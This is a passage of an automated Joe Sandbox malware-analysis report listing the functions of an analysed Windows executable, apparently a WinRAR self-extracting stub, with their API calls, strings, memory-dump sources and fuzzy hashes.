                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00D32583
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D32594
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D325A4
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D325B4
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D325EF
                                                                              • __aullrem.LIBCMT ref: 00D32699
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                              • String ID:
                                                                              • API String ID: 1247370737-0
                                                                              • Opcode ID: aa24dbecaec7e78d6493be89e22b93d5e1605c41c75bbad03c662d3893e0fdb8
                                                                              • Instruction ID: f83dd0fed4935ec71a984f2c1ffd9debde6fc805da5f6680f36e00ae5aa3c66e
                                                                              • Opcode Fuzzy Hash: aa24dbecaec7e78d6493be89e22b93d5e1605c41c75bbad03c662d3893e0fdb8
                                                                              • Instruction Fuzzy Hash: 4B411AB29083059FC714DF65D88496BBBF9FF88315F04892EF99AC2210E734E549CB62
                                                                              Function 00D3AD1E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                              • API String ID: 176396367-3568243669
                                                                              • Opcode ID: 05b2dc65374fa4789738e5d42ea5238e4ccb0e795c7dfd7a931af8a15caa0461
                                                                              • Instruction ID: 1e1592cca337693540519679f98af7487c32162f3bb6f6ae7ab547c0a3407519
                                                                              • Opcode Fuzzy Hash: 05b2dc65374fa4789738e5d42ea5238e4ccb0e795c7dfd7a931af8a15caa0461
                                                                              • Instruction Fuzzy Hash: B051F56674132396DB345A1CAC21B7673E0DFA4792F6C442BFDC1AB5C0FB698D818272
                                                                              Function 00D5084D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D50FC2,00000000,00000000,00000000,00000000,00000000,?), ref: 00D5088F
                                                                              • __fassign.LIBCMT ref: 00D5090A
                                                                              • __fassign.LIBCMT ref: 00D50925
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D5094B
                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00D50FC2,00000000,?,?,?,?,?,?,?,?,?,00D50FC2,00000000), ref: 00D5096A
                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00D50FC2,00000000,?,?,?,?,?,?,?,?,?,00D50FC2,00000000), ref: 00D509A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1324828854-0
                                                                              • Opcode ID: 46541c26f72f5a76cd44b0b61c140edcae9c57cbce10d6e01fc3cfa035567d4b
                                                                              • Instruction ID: 7d6d263f2847a5aca88c41cd441510c623e094fb2f158327ba437c75ee9303d2
                                                                              • Opcode Fuzzy Hash: 46541c26f72f5a76cd44b0b61c140edcae9c57cbce10d6e01fc3cfa035567d4b
                                                                              • Instruction Fuzzy Hash: 8A516171A00249AFDF10CFA8D845BEEBBF8EB49311F18411AEE55E7252E6309945CF71
                                                                              Function 00D43A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D43AC7
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00D43ACF
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D43B58
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00D43B83
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00D43BD8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: 3b07e420ce82850f403d4909f038d27ef03d8b898373abb0c987768146722332
                                                                              • Instruction ID: 3919a9db8c88d1b404a8f1936ee7e812d95192d5261307f233e806cef042df61
                                                                              • Opcode Fuzzy Hash: 3b07e420ce82850f403d4909f038d27ef03d8b898373abb0c987768146722332
                                                                              • Instruction Fuzzy Hash: 9C41BD34A00258AFCF10DF6DC885B9EBBB4EF45324F188155E814AB392C771EA55CBB1
                                                                              Function 00D3AEF5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000000), ref: 00D3AF0E
                                                                              • GetWindowRect.USER32(?,?), ref: 00D3AF64
                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00D3B001
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00D3B009
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00D3B01F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$RectText
                                                                              • String ID: RarHtmlClassName
                                                                              • API String ID: 3937224194-1658105358
                                                                              • Opcode ID: 56eefa9553597a2344b58434b80c5e7311e8ede00d6ec3f2d819a866c7608f67
                                                                              • Instruction ID: 587a281c91798883114bc54a0ccce6ad5073bc146c706f957e56bdea6ab504ea
                                                                              • Opcode Fuzzy Hash: 56eefa9553597a2344b58434b80c5e7311e8ede00d6ec3f2d819a866c7608f67
                                                                              • Instruction Fuzzy Hash: E641DF72504308AFCB219F24EC4DB6B7FE8EF08751F18455AF9899A15ADB70D804CB76
                                                                              Function 00D3A975 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                              • API String ID: 176396367-3743748572
                                                                              • Opcode ID: f39bb9601e818ae7e26d8977caf26f83f76b78e888714a3ab5a8c6362fc177c9
                                                                              • Instruction ID: 13dca0c22f888cb321c845b38cbc6e96a6c159aeabcc4062fdec82055d4d8805
                                                                              • Opcode Fuzzy Hash: f39bb9601e818ae7e26d8977caf26f83f76b78e888714a3ab5a8c6362fc177c9
                                                                              • Instruction Fuzzy Hash: 36313E237847019BD630AB589C42B7673E4EB90360F54841FF8D557280FB54AD94C3B7
                                                                              Function 00D4DA64 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D4DA28: _free.LIBCMT ref: 00D4DA51
                                                                              • _free.LIBCMT ref: 00D4DAB2
                                                                                • Part of subcall function 00D4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?), ref: 00D4A680
                                                                                • Part of subcall function 00D4A66A: GetLastError.KERNEL32(?,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?,?), ref: 00D4A692
                                                                              • _free.LIBCMT ref: 00D4DABD
                                                                              • _free.LIBCMT ref: 00D4DAC8
                                                                              • _free.LIBCMT ref: 00D4DB1C
                                                                              • _free.LIBCMT ref: 00D4DB27
                                                                              • _free.LIBCMT ref: 00D4DB32
                                                                              • _free.LIBCMT ref: 00D4DB3D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                              • Instruction ID: 2c70c6a8908278a50684ada8dd4da930685def0b63462107e337c865cd7f2885
                                                                              • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                              • Instruction Fuzzy Hash: 2B1190719D4B04BBD620BBB1CC07FCB77AEEF24700F880C14B29AA6252DA74B5158772
                                                                              Function 00D3F77A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D3F7F5,00D3F758,00D3F9F9), ref: 00D3F791
                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D3F7A7
                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D3F7BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                              • API String ID: 667068680-1718035505
                                                                              • Opcode ID: b7762fd16d74d83e473a2c685631f4678933caaa911dd952691c06fa5738484e
                                                                              • Instruction ID: b6445cf4f48d62b98966b12f0db9bcae920a64f00e623c3046d26b2bbf6dafaf
                                                                              • Opcode Fuzzy Hash: b7762fd16d74d83e473a2c685631f4678933caaa911dd952691c06fa5738484e
                                                                              • Instruction Fuzzy Hash: 0AF0F6B1F513265B9F605F784CC456B62DC9A11B56B2C043BEE55D3340E610CC8957F1
                                                                              Function 00D32799 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D327F1
                                                                                • Part of subcall function 00D2C619: GetVersionExW.KERNEL32(?), ref: 00D2C63E
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D32815
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3282F
                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D32842
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D32852
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D32862
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                              • String ID:
                                                                              • API String ID: 2092733347-0
                                                                              • Opcode ID: e2072904b104cd5142a96fb7e915c3a5afc714e95555eec9bcf9317452ef5747
                                                                              • Instruction ID: 21b3a1f784cef953968d7d0a3b3b17108ec2b3d76554d16a8189e13e016531b0
                                                                              • Opcode Fuzzy Hash: e2072904b104cd5142a96fb7e915c3a5afc714e95555eec9bcf9317452ef5747
                                                                              • Instruction Fuzzy Hash: 34311775108316ABC704DFA8D88499BBBF8FF98719F005A1EF999C3210E730D548CBA6
                                                                              Function 00D43C8A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00D43C81,00D43A3C,00D40BF4), ref: 00D43C98
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D43CA6
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D43CBF
                                                                              • SetLastError.KERNEL32(00000000,00D43C81,00D43A3C,00D40BF4), ref: 00D43D11
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: 4dc17904daba8befdb69d14e4365fd258ba575dfd112da2434991a5898398df2
                                                                              • Instruction ID: d523350d38f60e313cb8849d85b8e9e83b79445afd4c3fcbfa95119a510320af
                                                                              • Opcode Fuzzy Hash: 4dc17904daba8befdb69d14e4365fd258ba575dfd112da2434991a5898398df2
                                                                              • Instruction Fuzzy Hash: E201F7326193225FA614277CBCC572B2F54EB41775F340239F610A12E1EF915C4896F4
                                                                              Function 00D4A515 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00D63070,00D45982,00D63070,?,?,00D45281,00000050,?,00D63070,00000200), ref: 00D4A519
                                                                              • _free.LIBCMT ref: 00D4A54C
                                                                              • _free.LIBCMT ref: 00D4A574
                                                                              • SetLastError.KERNEL32(00000000,?,00D63070,00000200), ref: 00D4A581
                                                                              • SetLastError.KERNEL32(00000000,?,00D63070,00000200), ref: 00D4A58D
                                                                              • _abort.LIBCMT ref: 00D4A593
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 3160817290-0
                                                                              • Opcode ID: f9ec6b9b958e0b79d348411b0ba85a7823cc076ded3f72b63175b3a0d80fb3db
                                                                              • Instruction ID: b82b6a03329dea7a255a33b734f3d40ca7fc956a44746e959dc87361fcc7ae10
                                                                              • Opcode Fuzzy Hash: f9ec6b9b958e0b79d348411b0ba85a7823cc076ded3f72b63175b3a0d80fb3db
                                                                              • Instruction Fuzzy Hash: 59F028351C0701A7D201336C6E0AF2B2A65CBC1762B2D0118FA58E62D2FE658D015577
                                                                              Function 00D3ED8B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D3ED97
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3EDB1
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3EDC2
                                                                              • TranslateMessage.USER32(?), ref: 00D3EDCC
                                                                              • DispatchMessageW.USER32(?), ref: 00D3EDD6
                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D3EDE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 2148572870-0
                                                                              • Opcode ID: fbf30c2696eb19bd85fa19ac886852c8f77442d032920d0c3f6ab955867f307a
                                                                              • Instruction ID: d34c91811cb01033dfb7f0721114bbf909c6cc736945a6656b827bd7ff488898
                                                                              • Opcode Fuzzy Hash: fbf30c2696eb19bd85fa19ac886852c8f77442d032920d0c3f6ab955867f307a
                                                                              • Instruction Fuzzy Hash: 38F03776A01229ABCB206BA5EC4CDCF7F6CEF42391F148021BA0BD2194D6348555CBF1
                                                                              Function 00D2D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D31907: _wcslen.LIBCMT ref: 00D3190D
                                                                                • Part of subcall function 00D2CD5C: _wcsrchr.LIBVCRUNTIME ref: 00D2CD73
                                                                              • _wcslen.LIBCMT ref: 00D2D5A4
                                                                              • _wcslen.LIBCMT ref: 00D2D5EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcsrchr
                                                                              • String ID: .exe$.rar$.sfx
                                                                              • API String ID: 3513545583-31770016
                                                                              • Opcode ID: 3af61cc2b03bb09629704cc7ffdf2d2a5c183b82da4baa39d89c1ba9585b5f8b
                                                                              • Instruction ID: e120c61812097e6212a0aeeb17bea5ea1c2f0d654f213f7fdbe4a2c9a6a369d4
                                                                              • Opcode Fuzzy Hash: 3af61cc2b03bb09629704cc7ffdf2d2a5c183b82da4baa39d89c1ba9585b5f8b
                                                                              • Instruction Fuzzy Hash: DD4139129043319AC731AF34A842A7B73A6EF7674DF18490EFCC65B185E7A08D85C7B2
                                                                              Function 00D3DFCC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00D3DFE2
                                                                                • Part of subcall function 00D2CAA0: _wcslen.LIBCMT ref: 00D2CAA6
                                                                              • _swprintf.LIBCMT ref: 00D3E016
